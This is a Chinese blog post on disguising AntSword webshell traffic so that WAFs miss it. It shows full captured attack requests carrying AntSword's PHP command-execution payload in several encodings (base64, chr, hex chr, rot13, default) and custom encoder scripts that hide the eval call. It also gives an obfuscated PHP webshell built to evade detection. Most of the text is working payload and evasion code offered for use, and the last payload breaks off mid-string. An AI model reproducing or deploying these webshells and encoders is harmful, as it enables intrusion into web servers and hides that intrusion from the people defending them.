蚁剑的流量混淆和插件合集

admin 2024年9月28日13:45:42评论2 views字数 31749阅读105分49秒阅读模式

插件关注公众号后回复“蚁剑”即可。

原本流量特征

UA头

目前高版本的蚁剑配置的UA头为随机获取,低版本为antSword/v2.1

可在/modules/request.js中修改

// 请求UA
const USER_AGENT = require('random-fake-useragent');
const { unescape } = require('querystring');

Base64编码器

POST /vul/unsafeupload/uploads/1.php HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0
Content-Length: 4504

ce17f0873fa1f6=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmUwM2VhNCI7QG1rZGlyKCR0bWRpcik7aWYoIUBmaWxlX2V4aXN0cygkdG1kaXIpKXtjb250aW51ZTt9JHRtZGlyPXJlYWxwYXRoKCR0bWRpcik7QGNoZGlyKCR0bWRpcik7QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsICIuLiIpOyRjbnRhcnI9QHByZWdfc3BsaXQoIi9cXFxcfFwvLyIsJHRtZGlyKTtmb3IoJGk9MDskaTxzaXplb2YoJGNudGFycik7JGkrKyl7QGNoZGlyKCIuLiIpO307QGluaV9zZXQoIm9wZW5fYmFzZWRpciIsIi8iKTtAcm1kaXIoJHRtZGlyKTticmVhazt9O307O2Z1bmN0aW9uIGFzZW5jKCRvdXQpe3JldHVybiBAYmFzZTY0X2VuY29kZSgkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICJlMjciLiIxZWEiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjBiM2RkIi4iMzY4Yjc4Ijt9b2Jfc3RhcnQoKTt0cnl7JHA9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJzZmZiYjZlMTlhNjQ3MyJdLDIpKTskcz1iYXNlNjRfZGVjb2RlKHN1YnN0cigkX1BPU1RbIng2MzJhNzlhZWM2ZmYzIl0sMikpOyRlbnZzdHI9QGJhc2U2NF9kZWNvZGUoc3Vic3RyKCRfUE9TVFsiajIyMjU4MTg2Y2NlNjkiXSwyKSk7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI/Ii1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiO2lmKHN1YnN0cigkZCwwLDEpPT0iLyIpe0BwdXRlbnYoIlBBVEg9Ii5nZXRlbnYoIlBBVEgiKS4iOi91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL3NiaW46L3Vzci9iaW46L3NiaW46L2JpbiIpO31lbHNle0BwdXRlbnYoIlBBVEg9Ii5nZXRlbnYoIlBBVEgiKS4iO0M6L1dpbmRvd3Mvc3lzdGVtMzI7QzovV2luZG93cy9TeXNXT1c2NDtDOi9XaW5kb3dzO0M6L1dpbmRvd3MvU3lzdGVtMzIvV2luZG93c1Bvd2VyU2hlbGwvdjEuMC87Iik7fWlmKCFlbXB0eSgkZW52c3RyKSl7JGVudmFycj1leHBsb2RlKCJ8fHxhc2xpbmV8fHwiLCAkZW52c3RyKTtmb3JlYWNoKCRlbnZhcnIgYXMgJHYpIHtpZiAoIWVtcHR5KCR2KSkge0BwdXRlbnYoc3RyX3JlcGxhY2UoInx8fGFza2V5fHx8IiwgIj0iLCAkdikpO319fSRyPSJ7JHB9IHskY30iO2Z1bmN0aW9uIGZlKCRmKXskZD1leHBsb2RlKCIsIixAaW5pX2dldCgiZGlzYWJsZV9mdW5jdGlvbnMiKSk7aWYoZW1wdHkoJGQpKXskZD1hcnJheSgpO31lbHNleyRkPWFycmF5X21hcCgndHJpbScsYXJyYXlfbWFwKCdzdHJ0b2xvd2VyJywkZCkpO31yZXR1cm4oZnVuY3Rpb25fZXhpc3RzKCRmKSYmaXNfY2FsbGFibGUoJGYpJiYhaW5fYXJyYXkoJGYsJGQpKTt9O2Z1bmN0aW9uIHJ1bnNoZWxsc2hvY2soJGQsICRjKSB7aWYgKHN1YnN0cigkZCwgMCwgMSkgPT0gIi8iICYmIGZlKCdwdXRlbnYnKSAmJiAoZmUoJ2Vycm9yX2xvZycpIHx8IGZlKCdtYWlsJykpKSB7aWYgKHN0cnN0cihyZWFkbGluaygiL2Jpbi9zaCIpLCAiYmFzaCIpICE9IEZBTFNFKSB7JHRtcCA9IHRlbXBuYW0oc3lzX2dldF90ZW1wX2RpcigpLCAnYXMnKTtwdXRlbnYoIlBIUF9MT0w9KCkgeyB4OyB9OyAkYyA+JHRtcCAyPiYxIik7aWYgKGZlKCdlcnJvcl9sb2cnKSkge2Vycm9yX2xvZygiYSIsIDEpO30gZWxzZSB7bWFpbCgiYUAxMjcuMC4wLjEiLCAiIiwgIiIsICItYnYiKTt9fSBlbHNlIHtyZXR1cm4gRmFsc2U7fSRvdXRwdXQgPSBAZmlsZV9nZXRfY29udGVudHMoJHRtcCk7QHVubGluaygkdG1wKTtpZiAoJG91dHB1dCAhPSAiIikge3ByaW50KCRvdXRwdXQpO3JldHVybiBUcnVlO319cmV0dXJuIEZhbHNlO307ZnVuY3Rpb24gcnVuY21kKCRjKXskcmV0PTA7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKGZlKCdzeXN0ZW0nKSl7QHN5c3RlbSgkYywkcmV0KTt9ZWxzZWlmKGZlKCdwYXNzdGhydScpKXtAcGFzc3RocnUoJGMsJHJldCk7fWVsc2VpZihmZSgnc2hlbGxfZXhlYycpKXtwcmludChAc2hlbGxfZXhlYygkYykpO31lbHNlaWYoZmUoJ2V4ZWMnKSl7QGV4ZWMoJGMsJG8sJHJldCk7cHJpbnQoam9pbigiCiIsJG8pKTt9ZWxzZWlmKGZlKCdwb3BlbicpKXskZnA9QHBvcGVuKCRjLCdyJyk7d2hpbGUoIUBmZW9mKCRmcCkpe3ByaW50KEBmZ2V0cygkZnAsMjA0OCkpO31AcGNsb3NlKCRmcCk7fWVsc2VpZihmZSgncHJvY19vcGVuJykpeyRwID0gQHByb2Nfb3BlbigkYywgYXJyYXkoMSA9PiBhcnJheSgncGlwZScsICd3JyksIDIgPT4gYXJyYXkoJ3BpcGUnLCAndycpKSwgJGlvKTt3aGlsZSghQGZlb2YoJGlvWzFdKSl7cHJpbnQoQGZnZXRzKCRpb1sxXSwyMDQ4KSk7fXdoaWxlKCFAZmVvZigkaW9bMl0pKXtwcmludChAZmdldHMoJGlvWzJdLDIwNDgpKTt9QGZjbG9zZSgkaW9bMV0pO0BmY2xvc2UoJGlvWzJdKTtAcHJvY19jbG9zZSgkcCk7fWVsc2VpZihmZSgnYW50c3lzdGVtJykpe0BhbnRzeXN0ZW0oJGMpO31lbHNlaWYocnVuc2hlbGxzaG9jaygkZCwgJGMpKSB7cmV0dXJuICRyZXQ7fWVsc2VpZihzdWJzdHIoJGQsMCwxKSE9Ii8iICYmIEBjbGFzc19leGlzdHMoIkNPTSIpKXskdz1uZXcgQ09NKCdXU2NyaXB0LnNoZWxsJyk7JGU9JHctPmV4ZWMoJGMpOyRzbz0kZS0+U3RkT3V0KCk7JHJldC49JHNvLT5SZWFkQWxsKCk7JHNlPSRlLT5TdGRFcnIoKTskcmV0Lj0kc2UtPlJlYWRBbGwoKTtwcmludCgkcmV0KTt9ZWxzZXskcmV0ID0gMTI3O31yZXR1cm4gJHJldDt9OyRyZXQ9QHJ1bmNtZCgkci4iIDI+JjEiKTtwcmludCAoJHJldCE9MCk/InJldD17JHJldH0iOiIiOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7&j22258186cce69=1l&sffbb6e19a6473=MQY21k&x632a79aec6ff3=6MY2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIDJjODI4JmNkJmVjaG8gMGYzNTMyMw==&xxy=@eval(@base64_decode($_POST['ce17f0873fa1f6']));

base64编码器的大致工作就是将中间的操作函数全部通过base64加密后,最终使用eval(base64_decode())来执行,但是在此过程中eval()和base64_decode会被识别从而进行拦截

chr编码器

POST /vul/unsafeupload/uploads/1.php HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; de) Presto/2.9.168 Version/11.52
Content-Length: 27138

p6b4bef7012f21=ub&t8def9d1ac14f9=PJY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDM0ODUxJmNkJmVjaG8gNDEyMzY%3D&v9585f4ec5830f=7kY21k&xxy=%40eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(.......

可以看到当使用chr编码器时将所有操作函数通过CHR()编码后使用eval来执行,这种方式能够直接绕过safedog

chr编码器

POST /vul/unsafeupload/uploads/1.php HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 31892

ca9a2d11387c7e=2U&qc17c36e9b7b25=ITY21k&rfb799084cba76=LHY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDlhODI4MzgxNGUxJmNkJmVjaG8gYzA4N2MyYw%3D%3D&xxy=%40eVAl(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x70).ChR(0x6c).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x65).ChR(0x72).ChR(0x72).ChR(0x6f).

而chr16编码的形式和chr差别不大,也是将所有的操作函数通过CHR()编码后使用eval来执行,只是将其替换为16进制的形式

rot13编码器

使用rot13编码,将中间函数全部进行rot13编码,这样不会出现关键函数,而在最后使用eval(str_rot13())

s8ac55604ca2c9=vx&u4163519a490b5=6tY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDE5MWY2OGEmY2QmZWNobyBiMDBjZjhmYg==&x23a3ea1c851b7=@vav_frg("qvfcynl_reebef", "0");@frg_gvzr_yvzvg(0);$bcqve=@vav_trg("bcra_onfrqve");vs($bcqve) {$bpjq=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);$bcnee=cert_fcyvg(onfr64_qrpbqr("Ymg8Bv8="),$bcqve);@neenl_chfu($bcnee,$bpjq,flf_trg_grzc_qve());sbernpu($bcnee nf $vgrz) {vs(!@vf_jevgnoyr($vgrz)){pbagvahr;};$gzqve=$vgrz."/.267494p3";@zxqve($gzqve);vs(!@svyr_rkvfgf($gzqve)){pbagvahr;}$gzqve=ernycngu($gzqve);@puqve($gzqve);@vav_frg("bcra_onfrqve", "..");$pagnee=@cert_fcyvg("/\\|//",$gzqve);sbe($v=0;$v<fvmrbs($pagnee);$v++){@puqve("..");};@vav_frg("bcra_onfrqve","/");@ezqve($gzqve);oernx;};};;shapgvba nfrap($bhg){erghea fge_ebg13($bhg);};shapgvba nfbhgchg(){$bhgchg=bo_trg_pbagragf();bo_raq_pyrna();rpub "2po"."s49q";rpub @nfrap($bhgchg);rpub "193n7"."41576q";}bo_fgneg();gel{$c=onfr64_qrpbqr(fhofge($_CBFG["k7p0qpp3610035"],2));$f=onfr64_qrpbqr(fhofge($_CBFG["h4163519n490o5"],2));$raifge=@onfr64_qrpbqr(fhofge($_CBFG["f8np55604pn2p9"],2));$q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);$p=fhofge($q,0,1)=="/"?"-p "{$f}"":"/p "{$f}"";vs(fhofge($q,0,1)=="/"){@chgrai("CNGU=".trgrai("CNGU").":/hfe/ybpny/fova:/hfe/ybpny/ova:/hfe/fova:/hfe/ova:/fova:/ova");}ryfr{@chgrai("CNGU=".trgrai("CNGU").";P:/Jvaqbjf/flfgrz32;P:/Jvaqbjf/FlfJBJ64;P:/Jvaqbjf;P:/Jvaqbjf/Flfgrz32/JvaqbjfCbjreFuryy/i1.0/;");}vs(!rzcgl($raifge)){$rainee=rkcybqr("|||nfyvar|||", $raifge);sbernpu($rainee nf $i) {vs (!rzcgl($i)) {@chgrai(fge_ercynpr("|||nfxrl|||", "=", $i));}}}$e="{$c} {$p}";shapgvba sr($s){$q=rkcybqr(",",@vav_trg("qvfnoyr_shapgvbaf"));vs(rzcgl($q)){$q=neenl();}ryfr{$q=neenl_znc('gevz',neenl_znc('fgegbybjre',$q));}erghea(shapgvba_rkvfgf($s)&&vf_pnyynoyr($s)&&!va_neenl($s,$q));};shapgvba ehafuryyfubpx($q, $p) {vs (fhofge($q, 0, 1) == "/" && sr('chgrai') && (sr('reebe_ybt') || sr('znvy'))) {vs (fgefge(ernqyvax("/ova/fu"), "onfu") != SNYFR) {$gzc = grzcanz(flf_trg_grzc_qve(), 'nf');chgrai("CUC_YBY=() { k; }; $p >$gzc 2>&1");vs (sr('reebe_ybt')) {reebe_ybt("n", 1);} ryfr {znvy("[email protected]", "", "", "-oi");}} ryfr {erghea Snyfr;}$bhgchg = @svyr_trg_pbagragf($gzc);@hayvax($gzc);vs ($bhgchg != "") {cevag($bhgchg);erghea Gehr;}}erghea Snyfr;};shapgvba ehapzq($p){$erg=0;$q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);vs(sr('flfgrz')){@flfgrz($p,$erg);}ryfrvs(sr('cnffgueh')){@cnffgueh($p,$erg);}ryfrvs(sr('furyy_rkrp')){cevag(@furyy_rkrp($p));}ryfrvs(sr('rkrp')){@rkrp($p,$b,$erg);cevag(wbva("
",$b));}ryfrvs(sr('cbcra')){$sc=@cbcra($p,'e');juvyr(!@srbs($sc)){cevag(@strgf($sc,2048));}@cpybfr($sc);}ryfrvs(sr('cebp_bcra')){$c = @cebp_bcra($p, neenl(1 => neenl('cvcr', 'j'), 2 => neenl('cvcr', 'j')), $vb);juvyr(!@srbs($vb[1])){cevag(@strgf($vb[1],2048));}juvyr(!@srbs($vb[2])){cevag(@strgf($vb[2],2048));}@spybfr($vb[1]);@spybfr($vb[2]);@cebp_pybfr($c);}ryfrvs(sr('nagflfgrz')){@nagflfgrz($p);}ryfrvs(ehafuryyfubpx($q, $p)) {erghea $erg;}ryfrvs(fhofge($q,0,1)!="/" && @pynff_rkvfgf("PBZ")){$j=arj PBZ('JFpevcg.furyy');$r=$j->rkrp($p);$fb=$r->FgqBhg();$erg.=$fb->ErnqNyy();$fr=$r->FgqRee();$erg.=$fr->ErnqNyy();cevag($erg);}ryfr{$erg = 127;}erghea $erg;};$erg=@ehapzq($e." 2>&1");cevag ($erg!=0)?"erg={$erg}":"";;}pngpu(Rkprcgvba $r){rpub "REEBE://".$r->trgZrffntr();};nfbhgchg();qvr();&x7c0dcc3610035=xvY21k&xxy=@eval(@str_rot13($_POST['x23a3ea1c851b7']));

default默认编码器

ca1c21df2b501a=luY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDRkMTFmYzImY2QmZWNobyBkMjUwOTFhNA==&p72ba1eefea205=rM&vcd1fb13a5c712=zbY21k&xxy=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.3ff308";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\|//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "a8e57"."c6a20";echo @asenc($output);echo "56"."4dd";}ob_start();try{$p=base64_decode(substr($_POST["vcd1fb13a5c712"],2));$s=base64_decode(substr($_POST["ca1c21df2b501a"],2));$envstr=@base64_decode(substr($_POST["p72ba1eefea205"],2));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";if(substr($d,0,1)=="/"){@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");}else{@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");}if(!empty($envstr)){$envarr=explode("|||asline|||", $envstr);foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runshellshock($d, $c) {if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");if (fe('error_log')) {error_log("a", 1);} else {mail("[email protected]", "", "", "-bv");}} else {return False;}$output = @file_get_contents($tmp);@unlink($tmp);if ($output != "") {print($output);return True;}}return False;};function runcmd($c){$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join("
",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

特征为@ini_set

蚁剑流量混淆改造

b64pass编码器

/**
 * php::b64pass编码器
 *
 * 把所有 POST 参数都进行了 base64 编码
 *
 * 适用shell: 
 *
 * <?php @eval(base64_decode($_POST['ant']));?>
 * 
 */

'use strict';

module.exports = (pwd, data) => {
let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  data[randomID] = new Buffer(data['_']).toString('base64');
  data[pwd] = new Buffer(`eval(base64_decode($_POST[${randomID}]));die();`).toString('base64');
delete data['_'];
return data;
}
ant=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtfMHgxNmYwMzNjOTZmYmNjXSkpO2RpZSgpOw==&e84c55a2d1a848=HOY21k&jc3785466b27d1=rg&v530a18e4810bc=hNY2QgL2QgIkQ6XFxwaHBzdHVkeV9wcm9cXFdXV1xccGlrYWNodVxcdnVsXFx1bnNhZmV1cGxvYWRcXHVwbG9hZHMiJndob2FtaSZlY2hvIDljNjJhNmZhZGQxJmNkJmVjaG8gOGYzZTE2MzgzYg==

将原本base64数据包中的eval(base64_decode())再次进行base64编码,绕过安全设备对此的拦截

双b64编码器

/**
 * php::base64编码器
 * Create at: 2020/11/21 15:21:10
 */

'use strict';

/*
* @param  {String} pwd   链接密码
* @param  {Array}  data  编码器处理前的 payload 数组
* @return {Array}  data  编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
  // ##########    请在下方编写你本身的代码   ###################
  // 如下代码为 PHP Base64 样例

  // 生成一个随机变量名
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  // 原有的 payload 在 data['_']中
  // 取出来以后,转为 base64 编码并放入 randomID key 下
  data['_'] = Buffer.from(data['_']).toString('base64');

  // shell 在接收到 payload 后,先处理 pwd 参数下的内容,
  //data[pwd] = `${data['_']}"));`;
  data[pwd] = Buffer.from(data['_']).toString('base64');

  // ##########    请在上方编写你本身的代码   ###################

  // 删除 _ 原有的payload
  delete data['_'];
  // 返回编码器处理后的 payload 数组
  return data;
}

使用如下webshell

<?php 
header('HTTP/1.1 404');
class COMI { 
    public $c='';
    function __destruct() {
        return eval(substr($this->c, 0));
    }
}
$comi = new COMI();
$password = &$password1;
$password1 = $_REQUEST['password'];
$post = &$password;
$post=base64_decode(base64_decode($post));
$lnng1 = &$lnng;
$lnng = $post;
$lnng2 = $lnng1;
@$comi->c = substr($lnng2, 0);
?>
kaba7e5c4d23f=1kY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIDg4MDFhJmNkJmVjaG8gZjZmYTQ4Y2Y3&password=UUdsdWFWOXpaWFFvSW1ScGMzQnNZWGxmWlhKeWIzSnpJaXdnSWpBaUtUdEFjMlYwWDNScGJXVmZiR2x0YVhRb01DazdKRzl3WkdseVBVQnBibWxmWjJWMEtDSnZjR1Z1WDJKaGMyVmthWElpS1R0cFppZ2tiM0JrYVhJcElIc2tiMk4zWkQxa2FYSnVZVzFsS0NSZlUwVlNWa1ZTV3lKVFExSkpVRlJmUmtsTVJVNUJUVVVpWFNrN0pHOXdZWEp5UFhCeVpXZGZjM0JzYVhRb1ltRnpaVFkwWDJSbFkyOWtaU2dpVEhwME9FOXBPRDBpS1N3a2IzQmthWElwTzBCaGNuSmhlVjl3ZFhOb0tDUnZjR0Z5Y2l3a2IyTjNaQ3h6ZVhOZloyVjBYM1JsYlhCZlpHbHlLQ2twTzJadmNtVmhZMmdvSkc5d1lYSnlJR0Z6SUNScGRHVnRLU0I3YVdZb0lVQnBjMTkzY21sMFlXSnNaU2drYVhSbGJTa3BlMk52Ym5ScGJuVmxPMzA3SkhSdFpHbHlQU1JwZEdWdExpSXZMbVprWlRobE4yVmhZekExTUNJN1FHMXJaR2x5S0NSMGJXUnBjaWs3YVdZb0lVQm1hV3hsWDJWNGFYTjBjeWdrZEcxa2FYSXBLWHRqYjI1MGFXNTFaVHQ5SkhSdFpHbHlQWEpsWVd4d1lYUm9LQ1IwYldScGNpazdRR05vWkdseUtDUjBiV1JwY2lrN1FHbHVhVjl6WlhRb0ltOXdaVzVmWW1GelpXUnBjaUlzSUNJdUxpSXBPeVJqYm5SaGNuSTlRSEJ5WldkZmMzQnNhWFFvSWk5Y1hGeGNmRnd2THlJc0pIUnRaR2x5S1R0bWIzSW9KR2s5TURza2FUeHphWHBsYjJZb0pHTnVkR0Z5Y2lrN0pHa3JLeWw3UUdOb1pHbHlLQ0l1TGlJcE8zMDdRR2x1YVY5elpYUW9JbTl3Wlc1ZlltRnpaV1JwY2lJc0lpOGlLVHRBY20xa2FYSW9KSFJ0WkdseUtUdGljbVZoYXp0OU8zMDdPMloxYm1OMGFXOXVJR0Z6Wlc1aktDUnZkWFFwZTNKbGRIVnliaUJBWW1GelpUWTBYMlZ1WTI5a1pTZ2tiM1YwS1R0OU8yWjFibU4wYVc5dUlHRnpiM1YwY0hWMEtDbDdKRzkxZEhCMWREMXZZbDluWlhSZlkyOXVkR1Z1ZEhNb0tUdHZZbDlsYm1SZlkyeGxZVzRvS1R0bFkyaHZJQ0pqWXlJdUlqZzVPU0k3WldOb2J5QkFZWE5sYm1Nb0pHOTFkSEIxZENrN1pXTm9ieUFpTmpBNVlqY2lMaUl3TlRrME1DSTdmVzlpWDNOMFlYSjBLQ2s3ZEhKNWV5UndQV0poYzJVMk5GOWtaV052WkdVb2MzVmljM1J5S0NSZlVFOVRWRnNpZURjeE1qRXpNVFl6TlRobVlqa2lYU3d5S1NrN0pITTlZbUZ6WlRZMFgyUmxZMjlrWlNoemRXSnpkSElvSkY5UVQxTlVXeUpyWVdKaE4yVTFZelJrTWpObUlsMHNNaWtwT3lSbGJuWnpkSEk5UUdKaGMyVTJORjlrWldOdlpHVW9jM1ZpYzNSeUtDUmZVRTlUVkZzaWN6QXhaalJtTXpreU1XVm1ZalFpWFN3eUtTazdKR1E5WkdseWJtRnRaU2drWDFORlVsWkZVbHNpVTBOU1NWQlVYMFpKVEVWT1FVMUZJbDBwT3lSalBYTjFZbk4wY2lna1pDd3dMREVwUFQwaUx5SS9JaTFqSUZ3aWV5UnpmVndpSWpvaUwyTWdYQ0o3SkhOOVhDSWlPMmxtS0hOMVluTjBjaWdrWkN3d0xERXBQVDBpTHlJcGUwQndkWFJsYm5Zb0lsQkJWRWc5SWk1blpYUmxibllvSWxCQlZFZ2lLUzRpT2k5MWMzSXZiRzlqWVd3dmMySnBiam92ZFhOeUwyeHZZMkZzTDJKcGJqb3ZkWE55TDNOaWFXNDZMM1Z6Y2k5aWFXNDZMM05pYVc0NkwySnBiaUlwTzMxbGJITmxlMEJ3ZFhSbGJuWW9JbEJCVkVnOUlpNW5aWFJsYm5Zb0lsQkJWRWdpS1M0aU8wTTZMMWRwYm1SdmQzTXZjM2x6ZEdWdE16STdRem92VjJsdVpHOTNjeTlUZVhOWFQxYzJORHRET2k5WGFXNWtiM2R6TzBNNkwxZHBibVJ2ZDNNdlUzbHpkR1Z0TXpJdlYybHVaRzkzYzFCdmQyVnlVMmhsYkd3dmRqRXVNQzg3SWlrN2ZXbG1LQ0ZsYlhCMGVTZ2taVzUyYzNSeUtTbDdKR1Z1ZG1GeWNqMWxlSEJzYjJSbEtDSjhmSHhoYzJ4cGJtVjhmSHdpTENBa1pXNTJjM1J5S1R0bWIzSmxZV05vS0NSbGJuWmhjbklnWVhNZ0pIWXBJSHRwWmlBb0lXVnRjSFI1S0NSMktTa2dlMEJ3ZFhSbGJuWW9jM1J5WDNKbGNHeGhZMlVvSW54OGZHRnphMlY1Zkh4OElpd2dJajBpTENBa2Rpa3BPMzE5ZlNSeVBTSjdKSEI5SUhza1kzMGlPMloxYm1OMGFXOXVJR1psS0NSbUtYc2taRDFsZUhCc2IyUmxLQ0lzSWl4QWFXNXBYMmRsZENnaVpHbHpZV0pzWlY5bWRXNWpkR2x2Ym5NaUtTazdhV1lvWlcxd2RIa29KR1FwS1hza1pEMWhjbkpoZVNncE8zMWxiSE5sZXlSa1BXRnljbUY1WDIxaGNDZ25kSEpwYlNjc1lYSnlZWGxmYldGd0tDZHpkSEowYjJ4dmQyVnlKeXdrWkNrcE8zMXlaWFIxY200b1puVnVZM1JwYjI1ZlpYaHBjM1J6S0NSbUtTWW1hWE5mWTJGc2JHRmliR1VvSkdZcEppWWhhVzVmWVhKeVlYa29KR1lzSkdRcEtUdDlPMloxYm1OMGFXOXVJSEoxYm5Ob1pXeHNjMmh2WTJzb0pHUXNJQ1JqS1NCN2FXWWdLSE4xWW5OMGNpZ2taQ3dnTUN3Z01Ta2dQVDBnSWk4aUlDWW1JR1psS0Nkd2RYUmxiblluS1NBbUppQW9abVVvSjJWeWNtOXlYMnh2WnljcElIeDhJR1psS0NkdFlXbHNKeWtwS1NCN2FXWWdLSE4wY25OMGNpaHlaV0ZrYkdsdWF5Z2lMMkpwYmk5emFDSXBMQ0FpWW1GemFDSXBJQ0U5SUVaQlRGTkZLU0I3SkhSdGNDQTlJSFJsYlhCdVlXMG9jM2x6WDJkbGRGOTBaVzF3WDJScGNpZ3BMQ0FuWVhNbktUdHdkWFJsYm5Zb0lsQklVRjlNVDB3OUtDa2dleUI0